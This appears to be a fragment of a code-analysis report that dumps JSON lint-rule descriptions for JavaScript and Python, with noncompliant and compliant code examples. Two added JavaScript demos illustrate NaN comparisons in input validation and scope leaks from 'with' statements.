<\/p>\n<pre>\nif (parameter === void 0) {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3758","repo":"javascript","name":"Values not convertible to numbers should not be used in numeric comparisons","htmlDesc":"<p>In a Zen-like manner, <code>NaN<\/code> isn't equal to anything, even itself. So comparisons (<code>&gt;, &lt;, &gt;=, &lt;=<\/code>) where one\noperand is <code>NaN<\/code> or evaluates to <code>NaN<\/code> always return <code>false<\/code>. 
Specifically, <code>undefined<\/code> and objects that\ncannot be converted to numbers evaluate to <code>NaN<\/code> when used in numerical comparisons.<\/p>\n<p>This rule raises an issue when there is at least one path through the code where one of the operands to a comparison is <code>NaN<\/code>,\n<code>undefined<\/code> or an <code>Object<\/code> which cannot be converted to a number.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x;  \/\/ x is currently \"undefined\"\nif (someCondition()) {\n  x = 42;\n}\n\nif (42 &gt; x) {  \/\/ Noncompliant; \"x\" might still be \"undefined\"\n  doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj &gt; 24) { \/\/ Noncompliant\n  doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x;\nif (someCondition()) {\n  x = 42;\n} else {\n  x = foo();\n}\n\nif (42 &gt; x) {\n  doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj.prop &gt; 24) {\n  doSomething();\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3776","repo":"javascript","name":"Cognitive Complexity of functions should not be too high","htmlDesc":"<p>Cognitive Complexity is a measure of how hard the control flow of a function is to understand. Functions with high Cognitive Complexity will be\ndifficult to maintain.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/redirect.sonarsource.com\/doc\/cognitive-complexity.html\">Cognitive Complexity<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"threshold","htmlDesc":"The maximum authorized complexity.","defaultValue":"15","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S3782","repo":"javascript","name":"Arguments to built-in functions should match documented types","htmlDesc":"<p>The types of the arguments to built-in functions are specified in the JavaScript language specifications. 
Calls to these functions should conform\nto the documented types, otherwise the result will most likely not be what was expected (e.g.: the call would always return <code>false<\/code>).<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst isTooSmall = Math.abs(x &lt; 0.0042);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst isTooSmall = Math.abs(x) &lt; 0.0042;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3785","repo":"javascript","name":"\"in\" should not be used with primitive types","htmlDesc":"<p>The <code>in<\/code> operator tests whether the specified property is in the specified object.<\/p>\n<p>If the right operand is of a primitive type (i.e., not an object) the <code>in<\/code> operator raises a <code>TypeError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = \"Foo\";\n\"length\" in x; \/\/ Noncompliant: TypeError\n0 in x;        \/\/ Noncompliant: TypeError\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = new String(\"Foo\");\n\"length\" in x;    \/\/ true\n0 in x;           \/\/ true\n\"foobar\" in x;    \/\/ false\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3786","repo":"javascript","name":"Template literal placeholder syntax should not be used in regular strings","htmlDesc":"<p>JavaScript allows developers to embed variables or expressions in strings using template literals, instead of string concatenation. 
This is done by\nusing expressions like <code>${variable} <\/code> in a string between two back-ticks (<code>`<\/code>).<\/p>\n<p>When used in a regular string literal (between double or single quotes) the template will not be evaluated and will be used as a literal, which is\nprobably not what was intended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconsole.log(\"Today is ${date}\"); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconsole.log(`Today is ${date}`);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3796","repo":"javascript","name":"Callbacks of array methods should have return statements","htmlDesc":"<p>Arrays in JavaScript have several methods for filtering, mapping or folding that require a callback. Not having a return statement in such a\ncallback function is most likely a mistake.<\/p>\n<p>This rule applies for the following methods of an array:<\/p>\n<ul>\n  <li> <code>Array.from<\/code> <\/li>\n  <li> <code>Array.prototype.every<\/code> <\/li>\n  <li> <code>Array.prototype.filter<\/code> <\/li>\n  <li> <code>Array.prototype.find<\/code> <\/li>\n  <li> <code>Array.prototype.findIndex<\/code> <\/li>\n  <li> <code>Array.prototype.map<\/code> <\/li>\n  <li> <code>Array.prototype.reduce<\/code> <\/li>\n  <li> <code>Array.prototype.reduceRight<\/code> <\/li>\n  <li> <code>Array.prototype.some<\/code> <\/li>\n  <li> <code>Array.prototype.sort<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar merged = arr.reduce(function(a, b) {\n  a.concat(b);\n}); \/\/ Noncompliant: No return statement\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar merged = arr.reduce(function(a, b) {\n  return a.concat(b);\n});\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3799","repo":"javascript","name":"Destructuring patterns should not be empty","htmlDesc":"<p>Destructuring is a convenient way of 
extracting multiple values from data stored in (possibly nested) objects and arrays. However, it is possible\nto create an empty pattern that has no effect. When empty curly braces or brackets are used to the right of a property name most of the time the\nintent was to use a default value instead.<\/p>\n<p>This rule raises an issue when empty destructuring pattern is used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar {a: {}, b} = myObj; \/\/ Noncompliant\nfunction foo({first: [], second}) { \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar {a = {}, b} = myObj;\nfunction foo({first = [], second}) {\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3828","repo":"javascript","name":"\"yield\" expressions should not be used outside generators","htmlDesc":"<p>The <code>yield<\/code> keyword is used in a generator function to return an <code>IteratorResult<\/code> to the caller. It has no other purpose, and\nif found outside such a function will raise a <code>ReferenceError<\/code> because it is then treated as an identifier.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo() {\n  for (var i = 0; i &lt; 5; i++) {\n    yield i * 2;\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction * foo() {\n  for (var i = 0; i &lt; 5; i++) {\n    yield i * 2;\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3834","repo":"javascript","name":"\"Symbol\" should not be used as a constructor","htmlDesc":"<p><code>Symbol<\/code> is a primitive type introduced in ECMAScript2015. Its instances are mainly used as unique property keys.<\/p>\n<p>An instance can only be created by using <code>Symbol<\/code> as a function. 
Using <code>Symbol<\/code> with the <code>new<\/code> operator will raise\na <code>TypeError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst sym = new Symbol(\"foo\");   \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst sym = Symbol(\"foo\");\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3854","repo":"javascript","name":"super() should be invoked appropriately","htmlDesc":"<p>There are situations where <code>super()<\/code> must be invoked and situations where <code>super()<\/code> cannot be invoked.<\/p>\n<p>The basic rule is: a constructor in a non-derived class cannot invoke <code>super()<\/code>; a constructor in a derived class must invoke\n<code>super()<\/code>.<\/p>\n<p>Furthermore:<\/p>\n<p>- <code>super()<\/code> must be invoked before the <code>this<\/code> and <code>super<\/code> keywords can be used.<\/p>\n<p>- <code>super()<\/code> must be invoked with the same number of arguments as the base class' constructor.<\/p>\n<p>- <code>super()<\/code> can only be invoked in a constructor - not in any other method.<\/p>\n<p>- <code>super()<\/code> cannot be invoked multiple times in the same constructor.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Animal {\n  constructor() {\n    super();         \/\/ Noncompliant, super() cannot be invoked in a base class\n  }\n\n  doSomething() {\n  }\n}\n\nclass Dog extends Animal {\n  constructor(name) {\n    this.name = name;\n    super.doSomething();\n    super();         \/\/ Noncompliant, super() must be invoked before \"this\" or \"super\" is used\n  }\n\n  doSomething() {\n    super();         \/\/ Noncompliant, super() cannot be invoked outside of a constructor\n  }\n}\n\nclass Labrador extends Dog {\n  constructor(name) {\n    super();         \/\/ Noncompliant, super() must be invoked with one argument\n  }\n}\n\nclass GermanShepherd extends Dog {\n  constructor(name) {\n  }                  \/\/ 
Noncompliant, super() must be invoked in constructor of derived class\n}\n\nclass FilaBrasileiro extends Dog {\n  constructor(name) {\n    super(name);\n    super(name);    \/\/ Noncompliant, super() can only be invoked once\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Animal {\n  constructor() {\n  }\n\n  doSomething() {\n  }\n}\n\nclass Dog extends Animal {\n  constructor(name) {\n    super();\n    this.name = name;\n    super.doSomething();\n  }\n\n  doSomething() {\n  }\n}\n\nclass Labrador extends Dog {\n  constructor(name) {\n    super(name);\n  }\n}\n\nclass GermanShepherd extends Dog {\n  constructor(name) {\n    super(name);\n  }\n}\n\nclass FilaBrasileiro extends Dog {\n  constructor(name) {\n    super(name);\n  }\n}\n<\/pre>\n<h2>Known Limitations<\/h2>\n<ul>\n  <li>False negatives: some issues are not raised if the base class is not defined in the same file as the current class.<\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3923","repo":"javascript","name":"All branches in a conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having all branches in a <code>switch<\/code> or <code>if<\/code> chain with the same implementation is an error. Either a copy-paste error was made\nand something different should be executed, or there shouldn't be a <code>switch<\/code>\/<code>if<\/code> chain at all. Note that this rule does not\napply to <code>if<\/code> chains without <code>else<\/code>s, or to <code>switch<\/code>es without <code>default<\/code> clauses.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (b == 0) {  \/\/ Noncompliant\n  doOneMoreThing();\n}\nelse {\n  doOneMoreThing();\n}\n\nlet a = (b == 0) ? 
getValue() : getValue();   \/\/ Noncompliant\n\nswitch (i) {  \/\/ Noncompliant\n  case 1:\n    doSomething();\n    break;\n  case 2:\n    doSomething();\n    break;\n  case 3:\n    doSomething();\n    break;\n  default:\n    doSomething();\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S888","repo":"javascript","name":"Equality operators should not be used in \"for\" loop termination conditions","htmlDesc":"<p>Testing <code>for<\/code> loop termination using an equality operator (<code>==<\/code> and <code>!=<\/code>) is dangerous, because it could set up an\ninfinite loop. Using a broader relational operator instead casts a wider net, and makes it harder (but not impossible) to accidentally write an\ninfinite loop.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 1; i != 10; i += 2)  \/\/ Noncompliant. Infinite; i goes from 9 straight to 11.\n{\n  \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 1; i &lt;= 10; i += 2)  \/\/ Compliant\n{\n  \/\/...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Equality operators are ignored if the loop counter is not modified within the body of the loop and either:<\/p>\n<ul>\n  <li> starts below the ending value and is incremented by 1 on each iteration. <\/li>\n  <li> starts above the ending value and is decremented by 1 on each iteration. 
<\/li>\n<\/ul>\n<p>Equality operators are also ignored when the test is against <code>null<\/code>.<\/p>\n<pre>\nfor (var i = 0; arr[i] != null; i++) {\n  \/\/ ...\n}\n\nfor (var i = 0; (item = arr[i]) != null; i++) {\n  \/\/ ...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C++:2008, 6-5-2 <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/835\">MITRE, CWE-835<\/a> - Loop with Unreachable Exit Condition ('Infinite Loop') <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/EwDJAQ\">CERT, MSC21-C.<\/a> - Use robust loop termination conditions <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/GwDJAQ\">CERT, MSC21-CPP.<\/a> - Use inequality to terminate a loop whose counter changes\n  by more than one <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:StrictMode","repo":"javascript","name":"\"strict\" mode should be used with caution","htmlDesc":"<p>Even though it may be a good practice to enforce JavaScript strict mode, doing so could result in unexpected behaviors on browsers that do not\nsupport it yet. Using this feature should therefore be done with caution and with full knowledge of the potential consequences on browsers that do not\nsupport it.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction strict() {\n  'use strict';\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:SwitchWithoutDefault","repo":"javascript","name":"\"switch\" statements should end with \"default\" clauses","htmlDesc":"<p>The requirement for a final <code>default<\/code> clause is defensive programming. 
The clause should either take appropriate action, or contain a\nsuitable comment as to why no action is taken.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (param) {  \/\/missing default clause\n  case 0:\n    doSomething();\n    break;\n  case 1:\n    doSomethingElse();\n    break;\n}\n\nswitch (param) {\n  default: \/\/ default clause should be the last one\n    error();\n    break;\n  case 0:\n    doSomething();\n    break;\n  case 1:\n    doSomethingElse();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (param) {\n  case 0:\n    doSomething();\n    break;\n  case 1:\n    doSomethingElse();\n    break;\n  default:\n    error();\n    break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n  <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n  <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n  <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n  <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n  <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n  <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n  <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness 
<\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:UnusedVariable","repo":"javascript","name":"Unused local variables and functions should be removed","htmlDesc":"<p>If a local variable or a local function is declared but not used, it is dead code and should be removed. Doing so will improve maintainability\nbecause developers will not wonder what the variable or function is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction numberOfMinutes(hours) {\n  var seconds = 0;   \/\/ seconds is never used\n  return hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction numberOfMinutes(hours) {\n  return hours * 60;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:VariableShadowing","repo":"javascript","name":"Variables should not be shadowed","htmlDesc":"<p>Overriding a variable declared in an outer scope can strongly impact the readability, and therefore the maintainability, of a piece of code.\nFurther, it could lead maintainers to introduce bugs because they think they're using one variable but are really using another.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nshow: function(point, element) {\n  if (!this.drops.length) return;\n  var drop, affected = [];\n  this.drops.each( function(drop) {  \/\/ Non-Compliant; defines a new 'drop' parameter\n    if(Droppables.isAffected(point, element, drop))\n      affected.push(drop);\n  });\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nshow: function(point, element) {\n  if (!this.drops.length) return;\n  var drop, affected = [];\n  this.drops.each( function(aDrop) {\n    if(Droppables.isAffected(point, element, aDrop))\n      affected.push(aDrop);\n  });\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 5.2 - Identifiers in an inner scope shall not use the same name as an identifier in an outer scope, and therefore hide that\n  identifier 
<\/li>\n  <li> MISRA C++:2008, 2-10-2 - Identifiers declared in an inner scope shall not hide an identifier declared in an outer scope <\/li>\n  <li> MISRA C:2012, 5.3 - An identifier declared in an inner scope shall not hide an identifier declared in an outer scope <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/VwE\">CERT, DCL01-C.<\/a> - Do not reuse variable names in subscopes <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/cwAhAQ\">CERT, DCL01-CPP.<\/a> - Do not reuse variable names in subscopes <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:WithStatement","repo":"javascript","name":"\"with\" statements should not be used","htmlDesc":"<p>The use of the <code>with<\/code> keyword produces an error in JavaScript strict mode code. However, that's not the worst that can be said against\n<code>with<\/code>.<\/p>\n<p>Using <code>with<\/code> allows a short-hand access to an object's properties - assuming they're already set. But use <code>with<\/code> to access\nsome property not already set in the object, and suddenly you're catapulted out of the object scope and into the global scope, creating or overwriting\nvariables there. 
Since the effects of <code>with<\/code> are entirely dependent on the object passed to it, <code>with<\/code> can be dangerously\nunpredictable, and should never be used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = 'a';\n\nvar foo = {\n  y: 1\n}\n\nwith (foo) {  \/\/ Noncompliant\n  y = 4;  \/\/ updates foo.y\n  x = 3;  \/\/ does NOT add a foo.x property; updates x var in outer scope\n}\nprint(foo.x + \" \" + x); \/\/ shows: undefined 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = 'a';\n\nvar foo = {\n  y: 1\n}\n\nfoo.y = 4;\nfoo.x = 3;\n\nprint(foo.x + \" \" + x); \/\/ shows: 3 a\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"}],"language":"js","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};
      Severity: Minor
      Found in docs/js.html by fixme
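The S3758 description in the snippet above ("Values not convertible to numbers should not be used in numeric comparisons") matters most when the comparison is a security check. The following is an added example, not code from the sonar-rules project or from the rule text: a size limit written as a single `>` comparison silently passes `undefined`, `NaN` and non-numeric objects, because every comparison involving `NaN` is `false`. `MAX_UPLOAD_BYTES`, the two check functions and the `SAMPLES` inputs are constructed for this illustration.

```javascript
// Added example (not from the sonar-rules project or the Sonar rule text).
// Shows the S3758 failure mode in an input-validation setting, and a hardened
// check. MAX_UPLOAD_BYTES and SAMPLES are constructed for this example.

const MAX_UPLOAD_BYTES = 1024;

// Naive check: "reject only if size is over the limit". undefined (-> NaN),
// NaN itself and an object that cannot be converted to a number all make the
// comparison false, so they are treated as within the limit.
function withinLimitNaive(size) {
  return !(size > MAX_UPLOAD_BYTES);
}

// Hardened check: insist on a finite number first, then compare.
// Number.isFinite does no coercion, so the numeric string '512' is rejected
// too; callers must parse and validate before calling this.
function withinLimitStrict(size) {
  return Number.isFinite(size) && size >= 0 && size <= MAX_UPLOAD_BYTES;
}

// Constructed inputs mimicking what a Content-Length style field can hold.
const SAMPLES = [
  { label: 'normal', size: 512 },
  { label: 'too large', size: 4096 },
  { label: 'header missing', size: undefined },
  { label: 'parse failure', size: Number('abc') },   // NaN
  { label: 'object body', size: { prop: 42 } },       // not convertible
  { label: 'numeric string', size: '512' },
];

// Returns a map from sample label to the verdict of both checks.
function evaluate(samples) {
  const result = {};
  for (const { label, size } of samples) {
    result[label] = {
      naive: withinLimitNaive(size),
      strict: withinLimitStrict(size),
    };
  }
  return result;
}

console.log(evaluate(SAMPLES));
```

Only the `normal` sample is accepted by both checks; the naive check also accepts `header missing`, `parse failure`, `object body` and `numeric string`, which is exactly the class of input the rule warns about.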

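The WithStatement description in the snippet above says that a `with` block assigning to a name the object lacks "catapults" the write into the global scope. The following is an added example, not code from the sonar-rules project or from the rule text, that makes this observable. The `with` body is compiled with the `Function` constructor, which always produces a non-strict function, so `with` is accepted even if the file itself runs as a strict-mode module; `makeTarget()`, the field names `y`/`x` and the helper names are constructed for this illustration.

```javascript
// Added example (not from the sonar-rules project or the Sonar rule text).
// Demonstrates the with-statement scope leak and the strict-mode rejection
// described by the WithStatement rule. makeTarget() and the helpers are
// constructed for this example.

function makeTarget() {
  return { y: 1 };            // has y; deliberately has no x
}

// Non-compliant: names inside with(obj) resolve against obj first. `y` exists
// there and is updated; `x` does not, so the assignment escapes the object
// and, in a sloppy-mode function, creates a property on the global object.
// new Function always yields a sloppy-mode function unless the body opts in.
const leakyUpdate = new Function('obj',
  'with (obj) { y = 4; x = 3; } return obj;');

// Compliant: explicit property access; nothing can escape the object.
function explicitUpdate(obj) {
  obj.y = 4;
  obj.x = 3;
  return obj;
}

// Runs both variants from a clean global state and returns what ended up where.
function demonstrate() {
  delete globalThis.x;                     // start without a global x
  const leaked = leakyUpdate(makeTarget());
  const leakedGlobalX = globalThis.x;      // 3: the write escaped to the global
  delete globalThis.x;                     // clean up the pollution

  const explicit = explicitUpdate(makeTarget());
  return {
    leakedY: leaked.y,                                              // 4
    leakedHasX: Object.prototype.hasOwnProperty.call(leaked, 'x'),  // false
    leakedGlobalX,                                                  // 3
    explicitY: explicit.y,                                          // 4
    explicitX: explicit.x,                                          // 3
    explicitGlobalX: globalThis.x,                                  // undefined
  };
}

// Strict mode refuses `with` at parse time, which is the first safeguard the
// rule text mentions: compiling such a body throws a SyntaxError.
function withRejectedInStrictMode() {
  try {
    new Function('"use strict"; with ({}) {}');
    return false;
  } catch (e) {
    return e instanceof SyntaxError;
  }
}

console.log(demonstrate(), withRejectedInStrictMode());
```

The `leakedGlobalX` value is the point: a `with` block over attacker-influenced or merely unexpected objects can create or overwrite globals, and whether that happens depends on which properties the object happens to carry at runtime.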
      BUG found
      Open

              window.data = {"total":23,"p":1,"ps":500,"rules":[{"key":"common-py:FailedUnitTests","repo":"common-py","name":"Failed unit tests should be fixed","htmlDesc":"Test failures or errors generally indicate that regressions have been introduced. Those tests should be handled as soon as possible to reduce the cost to fix the corresponding regressions.","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"BUG"},{"key":"Pylint:E0203","repo":"Pylint","name":"Access to member before its definition","htmlDesc":"Used when an instance member is accessed before it's actually assigned.","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"CODE_SMELL"},{"key":"Pylint:E1101","repo":"Pylint","name":"Access of nonexistent member","htmlDesc":"Used when a variable is accessed for a nonexistent member.","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"CODE_SMELL"},{"key":"python:BackticksUsage","repo":"python","name":"Backticks should not be used","htmlDesc":"<p>Backticks are a deprecated alias for <code>repr()<\/code>. Don't use them any more, the syntax was removed in Python 3.0.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nreturn `num`  # Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nreturn repr(num)\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:ExecStatementUsage","repo":"python","name":"The \"exec\" statement should not be used","htmlDesc":"<p>Use of the <code>exec<\/code> statement could be dangerous, and should be avoided. Moreover, the <code>exec<\/code> statement was removed in Python\n3.0. 
Instead, the built-in <code>exec()<\/code> function can be used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nexec 'print 1' # Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nexec('print 1')\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:FunctionComplexity","repo":"python","name":"Functions should not be too complex","htmlDesc":"<p>The Cyclomatic Complexity of functions should not exceed a defined threshold. Complex code may perform poorly and can be difficult to test\nthoroughly.<\/p>","status":"READY","tags":["rank2"],"langName":"Python","params":[{"key":"maximumFunctionComplexityThreshold","htmlDesc":"The maximum authorized complexity in function","defaultValue":"15","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"python:InequalityUsage","repo":"python","name":"\"<>\" should not be used to test inequality","htmlDesc":"<p>The forms <code>&lt;&gt;<\/code> and <code>!=<\/code> are equivalent. But in Python 2.7.3 the <code>&lt;&gt;<\/code> form is considered obsolete.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nreturn a &lt;&gt; b # Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nreturn a != b\n<\/pre>","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"CODE_SMELL"},{"key":"python:PreIncrementDecrement","repo":"python","name":"Increment and decrement operators should not be used","htmlDesc":"<p>Python has no pre\/post increment\/decrement operator. For instance, <code>x++<\/code> and <code>x--<\/code> will fail to parse. More importantly,\n<code>++x<\/code> and <code>--x<\/code> will do nothing. 
To increment a number, simply write <code>x += 1<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n++x # Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nx += 1\n<\/pre>","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:PrintStatementUsage","repo":"python","name":"The \"print\" statement should not be used","htmlDesc":"<p>The <code>print<\/code> statement was removed in Python 3.0. The built-in function should be used instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nprint '1'  # Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nprint('1')\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S134","repo":"python","name":"Control flow statements \"if\", \"for\", \"while\", \"try\" and \"with\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>try<\/code>, and <code>with<\/code> statements are key ingredients for making\nwhat's known as \"Spaghetti code\". 
Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>The following code snippet illustrates this rule with the default threshold of 3.<\/p>\n<pre>\n  if condition1:           # Compliant - depth = 1\n    # ...\n    if condition2:         # Compliant - depth = 2\n      # ...\n      for i in range(10):  # Compliant - depth = 3, not exceeding the limit\n        # ...\n        if condition4:     # Non-Compliant - depth = 4\n          if condition5:   # Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n            # ...\n<\/pre>","status":"READY","tags":["rank2"],"langName":"Python","params":[{"key":"max","htmlDesc":"Maximum allowed &quot;if&quot;, &quot;for&quot;, &quot;while&quot;, &quot;try&quot; and &quot;with&quot; statements nesting depth","defaultValue":"4","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"python:S1656","repo":"python","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. 
Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nname = name\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nname = other.name\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S1700","repo":"python","name":"A field should not duplicate the name of its containing class","htmlDesc":"<p>It's confusing to have a class member with the same name (case differences aside) as its enclosing class. This is particularly so when you consider\nthe common practice of naming a class instance for the class itself.<\/p>\n<p>Best practice dictates that any field or member with the same name as the enclosing class be renamed to be more descriptive of the particular\naspect of the class it represents or holds.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo:\n  foo = ''\n\n  def getFoo(self):\n    ...\n\nfoo = Foo()\nfoo.getFoo() # what does this return?\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo:\n  name = ''\n\n  def getName(self):\n    ...\n\nfoo = Foo()\nfoo.getName()\n<\/pre>","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"CODE_SMELL"},{"key":"python:S1716","repo":"python","name":"\"break\" and \"continue\" should not be used outside a loop","htmlDesc":"<p><code>break<\/code> and <code>continue<\/code> are unstructured control flow statements which make code harder to read. 
